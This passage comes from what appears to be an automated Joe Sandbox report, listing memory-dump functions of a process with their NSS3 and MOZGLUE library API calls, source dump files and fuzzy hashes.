                                                                        • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CC21193), ref: 6CC21D7B
                                                                        • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CC21193), ref: 6CC21D87
                                                                        • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CC21193), ref: 6CC21D93
                                                                        • PR_DestroyLock.NSS3(00000000,?,?,6CC21193), ref: 6CC21D9F
                                                                        • free.MOZGLUE(00000000,?,6CC21193), ref: 6CC21DA8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                        • String ID:
                                                                        • API String ID: 3246495057-0
                                                                        • Opcode ID: 39267175f6a687e4f631dd3a39ff99918a5d4a7aaab65b7da36fe0673cb610be
                                                                        • Instruction ID: bf7e8ea3893174f61bf5a2d2820503f7fc7d501a19b4bae22722ce057339ac09
                                                                        • Opcode Fuzzy Hash: 39267175f6a687e4f631dd3a39ff99918a5d4a7aaab65b7da36fe0673cb610be
                                                                        • Instruction Fuzzy Hash: C831FEF1E007419BEB119F39AC41A6B76F4EF0164CF040538E85A87B41FB32E909CBA2
                                                                        Function 6CB75CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CB75EC0,00000000,?,?), ref: 6CB75CBE
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CB75CD7
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CB75CF0
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CB75D09
                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CB75EC0,00000000,?,?), ref: 6CB75D1F
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CB75D3C
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB75D51
                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB75D66
                                                                        • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CB75D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: strncmp$SecureStrdup_Util
                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                        • API String ID: 1171493939-3017051476
                                                                        • Opcode ID: e047e377edef37220f38a8268fb820e3780afe79d15057739af282c10274eaa4
                                                                        • Instruction ID: 1fd3c35b727d5ff0d20930785fcf38b682c6753a509acbc05fa712d8421f9582
                                                                        • Opcode Fuzzy Hash: e047e377edef37220f38a8268fb820e3780afe79d15057739af282c10274eaa4
                                                                        • Instruction Fuzzy Hash: 6231C4B06413E15FEB211A259F48F663778EF12248F140420ED65E6AC1FB62D529C37E
                                                                        Function 6CB76CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CC41DE0,?), ref: 6CB76CFE
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB76D26
                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CB76D70
                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6CB76D82
                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6CB76DA2
                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB76DD8
                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CB76E60
                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CB76F19
                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6CB76F2D
                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CB76F7B
                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB77011
                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6CB77033
                                                                        • free.MOZGLUE(?), ref: 6CB7703F
                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CB77060
                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CB77087
                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CB770AF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                        • String ID:
                                                                        • API String ID: 2108637330-0
                                                                        • Opcode ID: 4c4969e803d5f0dbd8f3ce207b439294d3ba3703255f820ec8501af729b665c1
                                                                        • Instruction ID: d2903d9271ca7bd6b3c1570d4c82d1333fe9a14f019c91f4228e328fbc22a4f7
                                                                        • Opcode Fuzzy Hash: 4c4969e803d5f0dbd8f3ce207b439294d3ba3703255f820ec8501af729b665c1
                                                                        • Instruction Fuzzy Hash: F1A107719182C09BEB209F24DC55B6A32A4EB8130CF248939ED38DBB81E775D859C773
                                                                        Function 6CB8AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8ADB1
                                                                          • Part of subcall function 6CB6BE30: SECOID_FindOID_Util.NSS3(6CB2311B,00000000,?,6CB2311B,?), ref: 6CB6BE44
                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB8ADF4
                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB8AE08
                                                                          • Part of subcall function 6CB6B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC418D0,?), ref: 6CB6B095
                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB8AE25
                                                                        • PL_FreeArenaPool.NSS3 ref: 6CB8AE63
                                                                        • PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB8AE4D
                                                                          • Part of subcall function 6CA94C70: TlsGetValue.KERNEL32(?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94C97
                                                                          • Part of subcall function 6CA94C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CB0
                                                                          • Part of subcall function 6CA94C70: PR_Unlock.NSS3(?,?,?,?,?,6CA93921,6CC714E4,6CBDCC70), ref: 6CA94CC9
                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8AE93
                                                                        • PR_CallOnce.NSS3(6CC72AA4,6CB712D0), ref: 6CB8AECC
                                                                        • PL_FreeArenaPool.NSS3 ref: 6CB8AEDE
                                                                        • PL_FinishArenaPool.NSS3 ref: 6CB8AEE6
                                                                        • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8AEF5
                                                                        • PL_FinishArenaPool.NSS3 ref: 6CB8AF16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                        • String ID: security
                                                                        • API String ID: 3441714441-3315324353
                                                                        • Opcode ID: 28061f24a099e1b6b7b44d59b4d4bcf476fda73cddbbfc6428fdb291ee6cf070
                                                                        • Instruction ID: 9a6f8c372e00674e8c09d3b4d13c99daaac5d219748cca60219387bca7801f9e
                                                                        • Opcode Fuzzy Hash: 28061f24a099e1b6b7b44d59b4d4bcf476fda73cddbbfc6428fdb291ee6cf070
                                                                        • Instruction Fuzzy Hash: 144109B1805290A7EB214A14DC45BBE32B8EF4171DF240925E854D6FC1F7359559CBF3
                                                                        Function 6CBA5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 6CBA2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBA2A28,00000060,00000001), ref: 6CBA2BF0
                                                                          • Part of subcall function 6CBA2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CBA2A28,00000060,00000001), ref: 6CBA2C07
                                                                          • Part of subcall function 6CBA2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CBA2A28,00000060,00000001), ref: 6CBA2C1E
                                                                          • Part of subcall function 6CBA2BE0: free.MOZGLUE(?,00000000,00000000,?,6CBA2A28,00000060,00000001), ref: 6CBA2C4A
                                                                        • free.MOZGLUE(?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5D0F
                                                                        • free.MOZGLUE(?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5D4E
                                                                        • free.MOZGLUE(?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5D62
                                                                        • free.MOZGLUE(?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5D85
                                                                        • free.MOZGLUE(?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5D99
                                                                        • free.MOZGLUE(?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5DFA
                                                                        • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5E33
                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBA5E3E
                                                                        • free.MOZGLUE(?,?,?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBA5E47
                                                                        • free.MOZGLUE(?,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000,?,6CBA80C1), ref: 6CBA5E60
                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CBAAAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CBA5E78
                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBA5EB9
                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBA5EF0
                                                                        • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBA5F3D
                                                                        • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CBAAAD4), ref: 6CBA5F4B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                        • String ID:
                                                                        • API String ID: 4273776295-0
                                                                        • Opcode ID: 769d712de8e9a5d766731868be7b81da4d4f340fee6723641bdbe3b593d7fd87
                                                                        • Instruction ID: 40459e912a29909be1c0d73dc4f9502631ad004b452366cbc12464c2561da5f2
                                                                        • Opcode Fuzzy Hash: 769d712de8e9a5d766731868be7b81da4d4f340fee6723641bdbe3b593d7fd87
                                                                        • Instruction Fuzzy Hash: 1771C4B5A04B409FD700CF64D884AA6B7F5FF49308F148529E89E87B11EB31F959CB52
                                                                        Function 6CB28DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • TlsGetValue.KERNEL32(?,?), ref: 6CB28E22
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB28E36
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB28E4F
                                                                        • calloc.MOZGLUE(00000001,?,?,?), ref: 6CB28E78
                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB28E9B
                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB28EAC
                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6CB28EDE
                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CB28EF0
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB28F00
                                                                        • free.MOZGLUE(?), ref: 6CB28F0E
                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6CB28F39
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB28F4A
                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6CB28F5B
                                                                        • PR_Unlock.NSS3(?), ref: 6CB28F72
                                                                        • PR_Unlock.NSS3(?), ref: 6CB28F82
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                        • String ID:
                                                                        • API String ID: 1569127702-0
                                                                        • Opcode ID: e97c6ee7891f334cfd0a23fe99f5ac93e21d3a9d05d02358d615fdbb0c6ac154
                                                                        • Instruction ID: 291d127521f76236c3eab3e81bf3051273dfe35e167b9176eb39bf1190e6c86f
                                                                        • Opcode Fuzzy Hash: e97c6ee7891f334cfd0a23fe99f5ac93e21d3a9d05d02358d615fdbb0c6ac154
                                                                        • Instruction Fuzzy Hash: 975103B3E002119FEB109E68CC8497EB7B9EF45758B15452AEC1CAB700E73AED4587E1
                                                                        Function 6CA9DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6CA9DD56
                                                                        • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CA9DD7C
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA9DE67
                                                                        • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CA9DEC4
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA9DECD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$_byteswap_ulong
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 2339628231-598938438
                                                                        • Opcode ID: 66249f1342c61a68e0abed72bbca6af6a8a8c59a6c299135cc71340cdc79b0a4
                                                                        • Instruction ID: d136259dfdee06cfc127ad678c91e53e78bb500fad5c848802d350c94d02413d
                                                                        • Opcode Fuzzy Hash: 66249f1342c61a68e0abed72bbca6af6a8a8c59a6c299135cc71340cdc79b0a4
                                                                        • Instruction Fuzzy Hash: 88A1C571E142019FD710CF29C582A6AB7F5AF85308F19892DF88A9BB51E730E8D5CB91
                                                                        Function 6CB5EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6CB5EE0B
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CB5EEE1
                                                                          • Part of subcall function 6CB51D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CB51D7E
                                                                          • Part of subcall function 6CB51D50: EnterCriticalSection.KERNEL32(?), ref: 6CB51D8E
                                                                          • Part of subcall function 6CB51D50: PR_Unlock.NSS3(?), ref: 6CB51DD3
                                                                        • TlsGetValue.KERNEL32 ref: 6CB5EE51
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB5EE65
                                                                        • PR_Unlock.NSS3(?), ref: 6CB5EEA2
                                                                        • free.MOZGLUE(?), ref: 6CB5EEBB
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB5EED0
                                                                        • PR_Unlock.NSS3(?), ref: 6CB5EF48
                                                                        • free.MOZGLUE(?), ref: 6CB5EF68
                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6CB5EF7D
                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6CB5EFA4
                                                                        • free.MOZGLUE(?), ref: 6CB5EFDA
                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CB5F055
                                                                        • free.MOZGLUE(?), ref: 6CB5F060
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                        • String ID:
                                                                        • API String ID: 2524771861-0
                                                                        • Opcode ID: d0e81de5e5d15f873ad60aa81b7da27530526e8add37fff019d370294ad6f875
                                                                        • Instruction ID: 10a48192997f17b2601cee20da9a8dbe27747eebb31e021bf290e7bc406548ec
                                                                        • Opcode Fuzzy Hash: d0e81de5e5d15f873ad60aa81b7da27530526e8add37fff019d370294ad6f875
                                                                        • Instruction Fuzzy Hash: AD817271E00289ABEF01DF65DC45AEE7BB5FF08318F540024E919A7711EB35E964CBA2
                                                                        Function 6CB24CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_SignatureLen.NSS3(?), ref: 6CB24D80
                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6CB24D95
                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6CB24DF2
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB24E2C
                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CB24E43
                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6CB24E58
                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CB24E85
                                                                        • DER_Encode_Util.NSS3(?,?,6CC705A4,00000000), ref: 6CB24EA7
                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CB24F17
                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CB24F45
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB24F62
                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB24F7A
                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CB24F89
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB24FC8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                        • String ID:
                                                                        • API String ID: 2843999940-0
                                                                        • Opcode ID: 495c6833a331f2b97b7d21ba22a79cb1b954d8850294f9feea3f0fdce4052d60
                                                                        • Instruction ID: 79d0c1446b07d076babd680b06b84f33c9a6715f6c925f0ed5476edda058b270
                                                                        • Opcode Fuzzy Hash: 495c6833a331f2b97b7d21ba22a79cb1b954d8850294f9feea3f0fdce4052d60
                                                                        • Instruction Fuzzy Hash: B6818071904381AFEB11CF25D840B6BB7E8EB88758F148929F95CDBA40E735E905CF92
                                                                        Function 6CB65C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CB65C9B
                                                                        • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CB65CF4
                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CB65CFD
                                                                        • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CB65D42
                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CB65D4E
                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB65D78
                                                                        • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CB65E18
                                                                        • TlsGetValue.KERNEL32 ref: 6CB65E5E
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6CB65E72
                                                                        • PR_Unlock.NSS3(?), ref: 6CB65E8B
                                                                          • Part of subcall function 6CB5F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CB5F854
